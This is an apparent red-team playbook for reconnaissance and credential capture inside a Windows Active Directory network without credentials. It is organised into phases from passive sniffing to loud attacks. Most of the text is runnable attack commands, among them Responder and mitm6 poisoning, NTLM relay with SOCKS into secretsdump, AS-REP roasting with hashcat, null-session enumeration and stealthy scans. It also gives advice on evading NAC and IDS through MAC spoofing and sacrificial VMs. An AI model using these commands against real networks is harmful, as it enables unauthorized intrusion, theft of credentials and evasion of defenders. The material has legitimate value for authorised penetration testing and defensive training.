2. Internal_NoCreds
Scenario 2: Internal Recon — On The Network, No Credentials
Position: Unauthenticated, physically/logically ON the target network
Goal: Discover hosts, services, and Domain Controllers without triggering NAC/IDS/SIEM
Visual Overview
graph TB
subgraph "Your Position"
A[Plugged Into Network
No Credentials]
end
subgraph "Phase 1: Silent (Zero Network Noise)"
B[Parse ARP Cache]
C[Passive Sniffing
tcpdump / Wireshark]
D[Responder -A
Analyze Mode]
end
subgraph "Phase 2: Quiet (Normal Traffic)"
E[DNS SRV Queries]
F[Anonymous LDAP Bind]
G[DHCP Fingerprinting]
end
subgraph "Phase 3: Active (Detectable)"
H[Null Session Enum]
I[Targeted Port Checks]
J[ARP Scanning]
end
subgraph "Phase 4: Loud (Credential Capture)"
K[Responder Poisoning]
L[mitm6 DHCPv6]
M[NTLM Relay]
end
A --> B & C & D
B & C & D --> E & F & G
E & F & G --> H & I & J
H & I & J --> K & L & M
style B fill:#00ff00
style C fill:#00ff00
style D fill:#00ff00
style E fill:#99ff00
style F fill:#99ff00
style H fill:#ffaa00
style K fill:#ff0000
style L fill:#ff00001. Why Proxychains Is (Mostly) Irrelevant Here
Key Insight: You don't have a pivot host yet. You ARE the first hop.
| Situation | Use Proxychains? | Why |
|---|---|---|
| Plugged into Ethernet, scanning directly | ❌ NO | You're scanning from YOUR machine — no proxy needed |
| Connected via rogue WiFi AP | ❌ NO | Same — direct network access |
| Routing through external VPS to hide internal MAC | ⚠️ MAYBE | Only if you want to hide your machine's IP from internal IDS |
| Using a disposable VM as sacrificial scanner | ⚠️ MAYBE | VM → SOCKS → target (adds layer of deniability) |
When proxychains DOES matter in this scenario:
- You've set up a local SOCKS proxy on a disposable VM to shield your primary attack box
- You're tunneling outbound through an external VPS to exfil captured data
- You're using
proxychains ncto probe a service through an internal device you've compromised early
2. Detection Surface — What's Watching You
Network Access Control (NAC)
┌─────────────────────────────────────────────────────────┐
│ NAC DETECTION LAYERS │
├─────────────────────────────────────────────────────────┤
│ │
│ Layer 1: 802.1X Port Authentication │
│ ► Requires valid certificate/credentials to get on LAN │
│ ► If you bypass: MAC whitelist, guest VLAN │
│ │
│ Layer 2: MAC Address Profiling │
│ ► Unknown MAC → quarantine VLAN │
│ ► OUI lookup → "Why is a Kali VM on our network?" │
│ │
│ Layer 3: DHCP Fingerprinting │
│ ► DHCP options reveal OS (option 55, 60) │
│ ► "Linux DHCP client on a Windows-only network" │
│ │
│ Layer 4: Network Behavior Analysis │
│ ► ARP storms, port sweeps, broadcast poisoning │
│ ► Unusual traffic patterns from new MAC │
│ │
└─────────────────────────────────────────────────────────┘
Evasion Strategies
# Spoof MAC to match existing device (after passive recon)
sudo macchanger -m AA:BB:CC:DD:EE:FF eth0
# Match DHCP fingerprint to Windows
# Use Windows VM instead of Kali, or:
sudo dhclient -v eth0 # Use system dhclient, not dhcpcd
# Disable IPv6 (prevents mitm6-style detection of YOUR machine)
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=1
sudo sysctl -w net.ipv6.conf.default.disable_ipv6=1
# Set hostname to blend in
sudo hostnamectl set-hostname YOURPC-PC01
3. Phase 1: Silent Discovery (Zero Network Noise)
3.1 Parse Local Caches
# ARP cache — who has your machine talked to already?
arp -a
ip neigh show
# DNS cache (if machine was already on network)
# Linux (systemd-resolved)
resolvectl query --cache
# Windows
ipconfig /displaydns
# Route table — reveals gateway, subnets
ip route show
route -n
# DHCP lease info — reveals DNS servers (often DCs), domain name
cat /var/lib/dhcp/dhclient.leases
# or
nmcli connection show --active | grep -i dns
nmcli connection show --active | grep -i domain
OPSEC Risk: 🟢 ZERO — No network traffic generated. Reading local state only.
3.2 Passive Network Sniffing
# Capture everything (first 5 minutes — don't modify, just listen)
sudo tcpdump -i eth0 -w /tmp/passive_capture.pcap -c 10000
# Targeted captures:
# Find Domain Controllers (Kerberos traffic)
sudo tcpdump -i eth0 -n 'port 88' -c 20
# Kerberos AS-REQ/AS-REP reveals DC IPs
# Find Domain Controllers (LDAP traffic)
sudo tcpdump -i eth0 -n 'port 389 or port 636' -c 20
# Find DNS servers (often DCs in AD)
sudo tcpdump -i eth0 -n 'port 53' -c 20
# Find file servers (SMB traffic)
sudo tcpdump -i eth0 -n 'port 445' -c 50
# Capture broadcast/multicast (reveals hostnames, services)
sudo tcpdump -i eth0 -n 'broadcast or multicast' -c 100
# LLMNR queries (reveals hostnames)
sudo tcpdump -i eth0 -n 'udp port 5355' -c 20
# NBT-NS queries (reveals hostnames + domain)
sudo tcpdump -i eth0 -n 'udp port 137' -c 20
# mDNS queries
sudo tcpdump -i eth0 -n 'udp port 5353' -c 20
OPSEC Risk: 🟢 ZERO — Promiscuous mode only. Some switches may detect promisc mode via ARP probe, but this is rare.
3.3 Responder Analyze Mode
# PASSIVE ONLY — listens for broadcasts, does NOT poison
sudo responder -I eth0 -A
# What you learn:
# - Domain name (FQDN)
# - Hostnames making LLMNR/NBT-NS/mDNS queries
# - Failed DNS lookups (typos = poisoning targets later)
# - Sometimes NTLMv2 hashes (if someone browses to non-existent share)
OPSEC Risk: 🟢 ZERO — -A flag = analyze only. No responses sent. No packets injected.
3.4 Passive Credential Extraction
# PCredz — extract credentials from live traffic
sudo python3 Pcredz -i eth0
# net-creds — similar but different protocol support
sudo python2 net-creds.py -i eth0
# What they capture (passively):
# - HTTP Basic Auth (cleartext)
# - FTP credentials (cleartext)
# - SMTP/POP3/IMAP passwords
# - NTLMv1/v2 challenge-response hashes
# - Kerberos tickets (AS-REQ)
# - SNMP community strings
OPSEC Risk: 🟢 ZERO — Pure passive capture. No injection.
4. Phase 2: Quiet Discovery (Normal-Looking Traffic)
4.1 DNS-Based DC Discovery
# DNS SRV records — THE BEST unauthenticated DC discovery method
# Looks like normal DNS traffic, impossible to distinguish from legitimate
# Find LDAP servers (Domain Controllers)
dig SRV _ldap._tcp.dc._msdcs.domain.local @DNS_SERVER_IP
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local DNS_SERVER_IP
# Find Kerberos KDC (Domain Controllers)
dig SRV _kerberos._tcp.domain.local @DNS_SERVER_IP
# Find Global Catalog servers
dig SRV _gc._tcp.domain.local @DNS_SERVER_IP
# Find PDC emulator
dig SRV _ldap._tcp.pdc._msdcs.domain.local @DNS_SERVER_IP
# Kerberos password change service
dig SRV _kpasswd._tcp.domain.local @DNS_SERVER_IP
# Automated with nmap
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.local'" DNS_SERVER_IP
OPSEC Risk: 🟢 LOW — Standard DNS queries. Indistinguishable from Windows workstation boot-up traffic. Every domain-joined PC makes these exact queries.
4.2 Anonymous LDAP Enumeration
# Check if anonymous LDAP bind is allowed
ldapsearch -x -H ldap://DC_IP -s base namingContexts
# If it works → enumerate everything:
# Find Domain Controllers (SERVER_TRUST_ACCOUNT flag)
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" \
"(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" \
dNSHostName operatingSystem
# Enumerate all users
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" \
"(objectClass=user)" sAMAccountName userPrincipalName
# Get password policy
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" \
"(objectClass=domain)" minPwdLength maxPwdAge lockoutThreshold
# windapsearch (automated)
python3 windapsearch.py --dc-ip DC_IP -u "" --functionality
python3 windapsearch.py --dc-ip DC_IP -u "" --users
python3 windapsearch.py --dc-ip DC_IP -u "" --groups
OPSEC Risk: 🟡 LOW-MEDIUM — Standard LDAP queries, but bulk anonymous queries may generate alerts. Rate-limit your queries.
4.3 DHCP/Network Infrastructure Intel
# DHCP server info (from your lease)
cat /var/lib/dhcp/dhclient.leases | grep -E "dhcp-server|domain-name|routers"
# In AD environments:
# - DNS server IPs are usually DCs
# - DHCP servers may be DCs or member servers
# - Domain name in DHCP = AD domain name
# - NTP server may be PDC emulator
# Discover DHCP server directly
nmap --script broadcast-dhcp-discover -e eth0
# ⚠️ Sends DHCP Discover — visible on network but normal traffic
5. Phase 3: Active Enumeration (Detectable)
5.1 Null Session Enumeration
# enum4linux-ng — comprehensive null session enum
enum4linux-ng -A DC_IP
# NetExec — null session share enumeration
netexec smb DC_IP -u '' -p '' --shares
netexec smb DC_IP -u '' -p '' --users
netexec smb DC_IP -u '' -p '' --pass-pol
netexec smb DC_IP -u 'guest' -p '' --shares
# rpcclient — null session RPC calls
rpcclient -U '' -N DC_IP
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> getdompwinfo
rpcclient $> lsaenumsid
rpcclient $> netshareenum
# Scan subnet for null session support
netexec smb SUBNET/24 -u '' -p '' --shares 2>/dev/null | grep -v "STATUS_ACCESS_DENIED"
# smbclient — list shares
smbclient -U '%' -N -L //DC_IP
# lookupsid.py — SID enumeration via null session
lookupsid.py -no-pass hostname.local
OPSEC Risk: 🟡 MEDIUM
- Generates Windows Event 4624 Type 3 (Anonymous logon)
- 4625 if null session is blocked (failed logon)
- IDS signature:
ET POLICY SMB Null Session Attempt - Network behavioral analytics may flag bulk null session attempts
5.2 Targeted Port Scanning
# Single host — critical ports only
nc -zv -w 1 TARGET_IP 22 80 88 135 139 389 443 445 636 3389 5985 2>&1 | grep succeeded
# Bash TCP socket (no nc binary needed — stealthier)
for port in 22 80 88 135 389 443 445 3389 5985; do
timeout 1 bash -c "</dev/tcp/TARGET_IP/$port" 2>/dev/null && echo "$port open"
done
# Nmap — slow and targeted (NO proxychains needed — you're direct)
nmap -sT -Pn -n -T2 --scan-delay 5s --max-retries 1 \
-p 22,53,80,88,135,139,389,443,445,636,1433,3306,3389,5432,5985,8080 \
--open TARGET_IP
# Find DCs by scanning AD ports
nmap -sT -Pn -n -p 88,389,636 --open SUBNET/24
# Hosts with 88+389+636 open = Domain Controllers
# Subnet sweep — SMB only (find Windows machines)
nmap -sT -Pn -n -p 445 --open SUBNET/24
OPSEC Risk: 🟡 MEDIUM
- Full TCP connect = connection logged at target
- Subnet sweeps generate many connections → IDS threshold triggers
- Mitigation: scan in small batches with random delays
5.3 ARP Scanning (Layer 2)
# ARP scan — fast host discovery, Layer 2 only
sudo arp-scan -I eth0 --localnet
# Nmap ARP ping (Layer 2, same subnet only)
sudo nmap -sn -PR SUBNET/24
# netdiscover — passive + active ARP
sudo netdiscover -i eth0 -r SUBNET/24 # Active
sudo netdiscover -i eth0 -p # Passive (listen only)
OPSEC Risk: 🟡 LOW-MEDIUM
- ARP requests are normal network traffic
- But scanning entire subnet creates ARP storm → detectable
- Passive netdiscover (
-p) = ZERO risk - Active netdiscover = visible ARP flood
6. Phase 4: Credential Capture (Loud But High Reward)
6.1 Responder — Active Poisoning
# Full poisoning mode (LLMNR + NBT-NS + mDNS + WPAD)
sudo responder -I eth0 -wFb
# Flags:
# -w WPAD proxy server
# -F Force NTLM auth on WPAD
# -b HTTP Basic Auth fallback
# Captured hashes → /usr/share/responder/logs/
# Crack with hashcat:
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt
OPSEC Risk: 🔴 HIGH
- Spoofed responses visible to every host on segment
- IDS:
ET POLICY LLMNR Query Responsefrom unexpected source - Network monitoring: new responder for LLMNR/NBT-NS/mDNS
- Windows Event correlation: auth from host that never authenticated before
- Mitigation: Run for short windows (15-30 min), then stop
6.2 mitm6 — DHCPv6 Poisoning
# DHCPv6 spoofing → force Windows machines to use YOU as DNS
sudo mitm6 -d domain.local -i eth0
# Combine with ntlmrelayx for authentication relay
sudo ntlmrelayx.py -6 -t ldaps://DC_IP -wh wpad.domain.local -l loot/
# Or target specific protocols
sudo ntlmrelayx.py -6 -t smb://TARGET_IP -smb2support -socks
OPSEC Risk: 🔴 HIGH
- Rogue DHCPv6 server on network → detectable
- IPv6 DNS responses from unexpected host
- NTLM relay creates auth from wrong source IP
- Mitigation: Only run when you know IPv6 monitoring is weak
6.3 NTLM Relay Attacks
# Find relay targets (SMB signing disabled)
netexec smb SUBNET/24 --gen-relay-list relay_targets.txt
# Relay captured auth to targets
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support
# With SOCKS (keep sessions for later use)
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -socks
# Then use proxychains through the SOCKS proxy:
proxychains -q smbclient.py DOMAIN/USER@TARGET -no-pass
proxychains -q smbexec.py DOMAIN/USER@TARGET -no-pass
proxychains -q secretsdump.py DOMAIN/USER@TARGET -no-pass
OPSEC Risk: 🔴 HIGH — But this is where proxychains becomes relevant:
ntlmrelayx -sockscreates a SOCKS4 proxy on port 1080proxychainsroutes your Impacket tools through the relayed sessions- Target sees auth from the relay source, not your IP
- Detection: SMB auth from unexpected source IP + unusual access patterns
7. When Proxychains Matters In This Scenario
7.1 Through ntlmrelayx SOCKS
# ntlmrelayx captured auth and holds SOCKS sessions
# Configure proxychains to use them:
cat > /etc/proxychains4.conf << 'EOF'
strict_chain
quiet_mode
[ProxyList]
socks4 127.0.0.1 1080
EOF
# Now use relayed sessions:
proxychains -q smbclient.py DOMAIN/RELAYED_USER@TARGET -no-pass
proxychains -q smbexec.py DOMAIN/RELAYED_USER@TARGET -no-pass
proxychains -q mssqlclient.py DOMAIN/RELAYED_USER@TARGET -no-pass -windows-auth
# Check active SOCKS sessions in ntlmrelayx console:
# ntlmrelayx> socks
# Shows: Protocol, Target, Username, AdminStatus, Port
What's Logged:
- Your machine:
proxychainsprocess,libproxychains.soloaded - ntlmrelayx: Connection log to target via relayed auth
- Target: Auth from ntlmrelayx IP (not your IP) — Event 4624 Type 3
- Network: SOCKS traffic on localhost (not visible externally)
7.2 Through a Sacrificial VM
# If you brought a disposable VM on a USB:
# 1. Bridge VM network to physical interface
# 2. Run SOCKS proxy on VM
# 3. Route your attack box through VM
# On VM (disposable scanner):
ssh -D 1080 -N -f localhost # Local SOCKS proxy
# On attack box:
proxychains -q nmap -sT -Pn -n --top-ports 20 --open SUBNET/24
# Target sees: VM's MAC/IP, not your primary attack box
# If VM gets burned → destroy it, continue from attack box
8. Kerberos-Based Attacks (No Creds Required)
8.1 Username Enumeration
# kerbrute — enumerate valid usernames via Kerberos
kerbrute userenum -d domain.local --dc DC_IP usernames.txt
# What's logged:
# - Event 4768 (Kerberos Authentication Service) for valid users
# - Event 4771 (Pre-Auth Failed) for valid users without pre-auth disabled
# - Nothing for invalid usernames (Kerberos just says "no such principal")
OPSEC Risk: 🟡 MEDIUM — Multiple Kerberos requests from single source
8.2 AS-REP Roasting (No Creds)
# Find users with "Do not require Kerberos pre-authentication"
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip DC_IP -no-pass -format hashcat
# Crack the TGTs:
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
OPSEC Risk: 🟡 MEDIUM — AS-REQ requests to DC, Event 4768
9. OPSEC Risk Matrix — Internal No Creds
| Technique | Risk | Detection Method | Windows Events | IDS Signature |
|---|---|---|---|---|
| ARP cache parsing | 🟢 ZERO | None | None | None |
| Passive sniffing | 🟢 ZERO | Promisc mode detection (rare) | None | None |
| Responder -A | 🟢 ZERO | None (passive listen) | None | None |
| DNS SRV queries | 🟢 LOW | DNS server logs | None | None |
| DHCP discovery | 🟢 LOW | DHCP server logs | None | None |
| Anonymous LDAP | 🟡 LOW-MED | DC event logs | 4624 (Anonymous) | None |
| ARP scan | 🟡 LOW-MED | ARP flood detection | None | ET SCAN ARP Sweep |
| Targeted port check | 🟡 MEDIUM | Connection logs | 5156 (WFP) | Threshold-based |
| Null session | 🟡 MEDIUM | SMB auth logs | 4624 Type 3, 4625 | ET POLICY SMB Null |
| Kerbrute | 🟡 MEDIUM | Kerberos logs | 4768, 4771 | ET POLICY Kerberos |
| AS-REP roast | 🟡 MEDIUM | Kerberos logs | 4768 | None |
| Subnet nmap sweep | 🟠 MED-HIGH | Network flow analysis | 5156 per target | ET SCAN Port Scan |
| Responder poisoning | 🔴 HIGH | Spoofed response detection | 4624 from wrong source | ET POLICY LLMNR |
| mitm6 | 🔴 HIGH | Rogue DHCPv6 detection | DHCP/DNS anomalies | ET POLICY DHCPv6 |
| NTLM relay | 🔴 HIGH | Auth from unexpected source | 4624 wrong source IP | SMB anomaly |
10. Quick Reference — Internal No Creds Workflow
# ===== PHASE 1: SILENT (first 30 minutes) =====
arp -a # Check ARP cache
ip route show # Check routes/subnets
cat /var/lib/dhcp/dhclient.leases # DHCP info (DNS, domain)
sudo tcpdump -i eth0 -n 'port 88' -c 10 # Find DCs (Kerberos)
sudo responder -I eth0 -A # Listen for broadcasts
sudo python3 Pcredz -i eth0 # Passive cred capture
# ===== PHASE 2: QUIET (30-60 minutes) =====
dig SRV _ldap._tcp.dc._msdcs.DOMAIN @DNS_IP # Find DCs
ldapsearch -x -H ldap://DC_IP -s base namingContexts # Test anonymous LDAP
ldapsearch -x -H ldap://DC_IP -b "DC=dom,DC=local" \
"(userAccountControl:1.2.840.113556.1.4.803:=8192)" dNSHostName # Find DCs
# ===== PHASE 3: ACTIVE (1-3 hours) =====
netexec smb SUBNET/24 -u '' -p '' --shares # Null sessions
enum4linux-ng -A DC_IP # Full null enum
nmap -sT -Pn -n -p 88,389,445 --open SUBNET/24 # Find AD hosts
# ===== PHASE 4: LOUD (when ready to capture creds) =====
sudo responder -I eth0 -wFb # Poison broadcasts
netexec smb SUBNET/24 --gen-relay-list targets.txt # Find relay targets
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks # Relay + SOCKS
proxychains -q secretsdump.py DOMAIN/USER@TARGET -no-pass # Use relayed auth
11. Enterprise Port Reference
When performing targeted port checks, knowing which services matter most is critical. This reference organizes ports by business value and attack surface.
TIER 1: Critical Domain Services (Highest Value)
Active Directory
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 88 | TCP/UDP | Kerberos | AS-REP roasting, Kerberoasting, ticket attacks |
| 135 | TCP | MSRPC/WMI | RPC enumeration, WMI execution, lateral movement |
| 139 | TCP | NetBIOS | Legacy SMB, name resolution, null sessions |
| 389 | TCP | LDAP | AD enumeration, user/group/computer lists |
| 445 | TCP | SMB | Share enum, relay attacks, EternalBlue, PsExec |
| 464 | TCP | Kpasswd | Password changes, Kerberos password attacks |
| 636 | TCP | LDAPS | Encrypted LDAP (same enum, harder to intercept) |
| 3268 | TCP | Global Catalog | Cross-domain AD queries |
| 3269 | TCP | Global Catalog SSL | Encrypted cross-domain queries |
| 5985 | TCP | WinRM HTTP | PowerShell remoting, lateral movement |
| 5986 | TCP | WinRM HTTPS | Encrypted PS remoting |
| 9389 | TCP | AD Web Services | ADWS enumeration |
Remote Access
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 22 | TCP | SSH | Shell access, tunneling, key-based auth |
| 23 | TCP | Telnet | Cleartext credentials (legacy) |
| 3389 | TCP | RDP | GUI access, BlueKeep (CVE-2019-0708) |
| 5900 | TCP | VNC | Screen sharing, often weak/no auth |
| 5800 | TCP | VNC HTTP | Web-based VNC |
TIER 2: Valuable Services
Databases
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 1433 | TCP | MSSQL | xp_cmdshell, linked servers, cred dumping |
| 1434 | UDP | MSSQL Browser | Instance discovery |
| 3306 | TCP | MySQL | UDF injection, file read/write |
| 5432 | TCP | PostgreSQL | RCE via COPY FROM PROGRAM |
| 1521 | TCP | Oracle TNS | TNS poisoning, SID enumeration |
| 6379 | TCP | Redis | Usually no auth, RCE via modules |
| 27017 | TCP | MongoDB | Often no auth, data exfil |
| 9200 | TCP | Elasticsearch | Often no auth, index dumping |
| 5984 | TCP | CouchDB | REST API, often open |
| 11211 | TCP | Memcached | Cache data extraction |
Web Services
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 80 | TCP | HTTP | Web apps, default pages, misconfig |
| 443 | TCP | HTTPS | Same + certificate info, TLS vulns |
| 8080 | TCP | HTTP Alt | Jenkins, Tomcat, dev servers |
| 8443 | TCP | HTTPS Alt | Management consoles |
| 8888 | TCP | HTTP Alt | Dev tools, Jupyter notebooks |
| 8000 | TCP | HTTP Alt | Django dev, various apps |
| 9090 | TCP | Various | Prometheus, Cockpit, WebSphere |
| 9443 | TCP | HTTPS Alt | Management interfaces |
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 25 | TCP | SMTP | Open relay, user enum (VRFY/RCPT) |
| 110 | TCP | POP3 | Cleartext email retrieval |
| 143 | TCP | IMAP | Email access, credential reuse |
| 465 | TCP | SMTPS | Encrypted SMTP |
| 587 | TCP | SMTP Submission | Auth SMTP, password spraying |
| 993 | TCP | IMAPS | Encrypted IMAP |
| 995 | TCP | POP3S | Encrypted POP3 |
TIER 3: Infrastructure & Management
File Sharing
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 21 | TCP | FTP | Anonymous login, cleartext creds |
| 69 | UDP | TFTP | No auth, config file exfil |
| 111 | TCP | RPCbind/NFS | NFS share enumeration |
| 2049 | TCP | NFS | Mount shares, steal files |
| 873 | TCP | Rsync | Sometimes no auth, file access |
Network Management
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 53 | TCP/UDP | DNS | Zone transfer, subdomain enum |
| 161 | UDP | SNMP | Community strings, full system info |
| 162 | UDP | SNMP Trap | Trap data interception |
| 514 | UDP | Syslog | Log interception |
| 1812 | UDP | RADIUS | Auth infrastructure |
| 49 | TCP | TACACS+ | Network device auth |
Virtualization & Cloud
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 443 | TCP | vCenter/ESXi | VMware management, VM escape |
| 902 | TCP | VMware | Virtual console access |
| 8006 | TCP | Proxmox | Virtualization management |
| 2375 | TCP | Docker API | Container control (often no auth!) |
| 2376 | TCP | Docker TLS | Encrypted Docker API |
| 6443 | TCP | Kubernetes API | K8s cluster control |
| 10250 | TCP | Kubelet | Node-level K8s access |
CI/CD & DevOps
| Port | Protocol | Service | What You Get |
|---|---|---|---|
| 8080 | TCP | Jenkins | RCE via Groovy console |
| 3000 | TCP | Grafana/Gitea | Dashboards, code repos |
| 9000 | TCP | SonarQube | Code analysis, secrets |
| 5000 | TCP | Docker Registry | Image pull/push |
| 8200 | TCP | Vault | Secret management |
| 4243 | TCP | Docker | Legacy Docker API |
Quick-Copy Port Lists
# AD/Domain Controller ports
-p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389
# Web services
-p 80,443,8080,8443,8888,8000,9090,9443
# Databases
-p 1433,1434,3306,5432,1521,6379,27017,9200,5984,11211
# Remote access
-p 22,23,3389,5900,5800
# Full enterprise scan (comprehensive but slow)
-p 21,22,23,25,53,69,80,88,110,111,135,139,143,161,389,443,445,464,\
465,514,587,636,873,993,995,1433,1434,1521,2049,2375,2376,3000,3268,\
3269,3306,3389,5000,5432,5800,5900,5984,5985,5986,6379,6443,8000,\
8006,8080,8200,8443,8888,9000,9090,9200,9389,9443,10250,11211,27017
12. Living Off The Land (LOTL) Network Recon
When you can't use scanning tools, native OS capabilities become invaluable. These commands leave minimal forensic artifacts and blend with normal system operations.
Windows - Passive Discovery (Zero Network Noise)
# ════════════════════════════════════════════════════
# ZERO NOISE - Parse existing caches
# ════════════════════════════════════════════════════
# ARP cache - hosts your machine already talked to
Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable"} |
Select IPAddress, LinkLayerAddress, State | Format-Table
# DNS cache - recently resolved hostnames
Get-DnsClientCache | Select Entry, Data, Type | Format-Table
# Recent network connections
Get-NetTCPConnection -State Established |
Select LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess |
Format-Table
# NetBIOS name cache
nbtstat -c
# Routing table (understand network segmentation)
Get-NetRoute | Where-Object {$_.DestinationPrefix -ne "0.0.0.0/0"} |
Select DestinationPrefix, NextHop, InterfaceAlias | Format-Table
Windows - AD-Based Host Discovery
# ════════════════════════════════════════════════════
# LOW NOISE - Query AD for computer objects
# ════════════════════════════════════════════════════
# All computers in domain (LDAP query - less noisy than net commands)
$searcher = [adsisearcher]"(objectCategory=computer)"
$searcher.PageSize = 100
$searcher.PropertiesToLoad.AddRange(@("name","operatingsystem","dnshostname","lastlogontimestamp"))
$computers = $searcher.FindAll()
$computers | ForEach-Object {
[PSCustomObject]@{
Name = $_.Properties["name"][0]
OS = $_.Properties["operatingsystem"][0]
DNS = $_.Properties["dnshostname"][0]
LastLogon = [DateTime]::FromFileTime([Int64]$_.Properties["lastlogontimestamp"][0])
}
} | Sort-Object LastLogon -Descending | Format-Table
# Domain Controllers
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers |
Select Name, IPAddress, OSVersion
# Find servers by OS type
([adsisearcher]"(&(objectCategory=computer)(operatingSystem=*Server*))").FindAll() |
ForEach-Object { $_.Properties["dnshostname"][0] }
# Find SQL servers (SPN-based)
([adsisearcher]"(servicePrincipalName=MSSQL*)").FindAll() |
ForEach-Object { $_.Properties["dnshostname"][0] }
# Find web servers (SPN-based)
([adsisearcher]"(servicePrincipalName=HTTP/*)").FindAll() |
ForEach-Object { $_.Properties["dnshostname"][0] }
Windows - Targeted Port Checks (No Nmap)
# ════════════════════════════════════════════════════
# Single port test (quiet, no nmap needed)
# ════════════════════════════════════════════════════
function Test-Port {
param([string]$Host, [int]$Port, [int]$Timeout = 1000)
try {
$tcp = New-Object System.Net.Sockets.TcpClient
$result = $tcp.BeginConnect($Host, $Port, $null, $null)
$success = $result.AsyncWaitHandle.WaitOne($Timeout)
$tcp.Close()
return $success
} catch { return $false }
}
# Test single host, multiple ports (with delays!)
$target = "10.10.10.50"
$ports = @(22, 80, 135, 445, 3389, 5985)
foreach ($port in $ports) {
$open = Test-Port -Host $target -Port $port
if ($open) { Write-Output "${target}:${port} OPEN" }
Start-Sleep -Seconds (Get-Random -Minimum 30 -Maximum 90)
}
# Scan subnet for single port (SLOW - with long delays)
$subnet = "10.10.10"
1..254 | ForEach-Object {
$ip = "$subnet.$_"
if (Test-Port -Host $ip -Port 445 -Timeout 500) {
Write-Output "$ip:445 OPEN"
}
Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 15)
}
Linux - LOTL Network Recon
# ════════════════════════════════════════════════════
# PASSIVE - No network traffic generated
# ════════════════════════════════════════════════════
# ARP cache
ip neigh show | grep -v FAILED
# DNS cache (if systemd-resolved)
resolvectl statistics
resolvectl query --cache
# Active connections
ss -tulpn # Listening ports
ss -tn state established # Established connections
# Routing table
ip route show
# ════════════════════════════════════════════════════
# ACTIVE - Minimal noise port checking
# ════════════════════════════════════════════════════
# Bash TCP port check (no tools needed)
(echo >/dev/tcp/10.10.10.50/445) 2>/dev/null && echo "445 open" || echo "445 closed"
# Scan multiple ports on one host
for port in 22 80 135 445 3389 5985; do
(echo >/dev/tcp/10.10.10.50/$port) 2>/dev/null && echo "$port open"
sleep $((RANDOM % 30 + 10)) # 10-40 second random delay
done
# Netcat port scan (if available)
nc -zv -w 1 10.10.10.50 22 80 443 445 2>&1 | grep succeeded
# /dev/tcp subnet sweep for single port
for i in $(seq 1 254); do
(echo >/dev/tcp/10.10.10.$i/445) 2>/dev/null && echo "10.10.10.$i:445 open"
sleep $((RANDOM % 10 + 5))
done
13. Unauthenticated Attack Flow Diagrams
These mermaid diagrams visualize the complete attack chains from zero credentials to first credential.
Adversary TTP Flow: Zero Creds → First Credential
graph TB
A["On The Wire
(No Creds)"] --> B{Passive First}
B --> C["Listen: Responder -A
ARP cache, DNS cache
Network traffic sniffing"]
C --> D{What Did You Find?}
D -->|"Broadcast traffic"| E["Poison: Responder + ntlmrelayx
mitm6 + ntlmrelayx"]
D -->|"Live hosts"| F["Enumerate: Null sessions
Anonymous LDAP
SNMP default strings"]
D -->|"Service ports"| G["Probe: FTP anon, Redis no-auth
MongoDB open, Docker API"]
E --> H["Captured NTLMv2 Hash
or Relayed Auth"]
F --> I["Usernames, Shares
Password Policy"]
G --> J["Direct Access
Config Files, Data"]
H --> K["Crack Hash
or Relay to LDAP/SMB"]
I --> L["AS-REP Roast
Password Spray"]
J --> M["Credentials in Config
Keys, Tokens"]
K --> N["FIRST CREDENTIAL"]
L --> N
M --> N
style A fill:#ff6600
style N fill:#00ff00
style E fill:#ff0000
style H fill:#ffaa00Responder + NTLM Relay Attack Flow
graph TB
A["Start: Responder Listening
on Network"] --> B{Traffic Type}
B -->|"LLMNR Query"| C["Poison Response
(Claim to be target)"]
B -->|"NBT-NS Query"| C
B -->|"mDNS Query"| C
C --> D["Victim Connects
to Your Listener"]
D --> E{Relay or Capture?}
E -->|"Capture Hash"| F["Receive NTLMv2 Hash
(Saved to /usr/share/responder/logs/)"]
E -->|"Relay Auth"| G["Forward Auth to Target
(ntlmrelayx)"]
F --> H["Crack Hash Offline
(hashcat -m 5600)"]
G --> I{Relay Target Type}
I -->|"SMB Target"| J["Relay to SMB
(Dump SAM, Execute)"]
I -->|"LDAP/LDAPS Target"| K["Relay to LDAP
(Dump AD, Add Computer)"]
I -->|"HTTP/ADCS Target"| L["Relay to ADCS
(Request Certificate)"]
H --> M["First Credential"]
J --> M
K --> M
L --> M
style A fill:#ff9900
style M fill:#00ff00
style F fill:#ffcc00
style G fill:#ff6600NULL Session Enumeration Attack Chain
graph LR
A["NULL Session Attempt
SMB Port 445"] --> B{Auth Allowed?}
B -->|"Access Denied"| C["Try Guest Account
user='guest' pass=''"]
B -->|"Success"| D["NULL Session Established"]
C --> E{Guest Allowed?}
E -->|"Yes"| D
E -->|"No"| F["End: No Anonymous Access"]
D --> G["Enumerate with enum4linux-ng
or rpcclient"]
G --> H["Extract Data"]
H --> I["Usernames
(enumdomusers)"]
H --> J["Groups
(enumdomgroups)"]
H --> K["Password Policy
(getdompwinfo)"]
H --> L["Shares
(netshareenum)"]
H --> M["Domain SID
(lsaenumsid)"]
I --> N["User List for
AS-REP Roast or Spray"]
K --> N
N --> O["Next Attack Phase"]
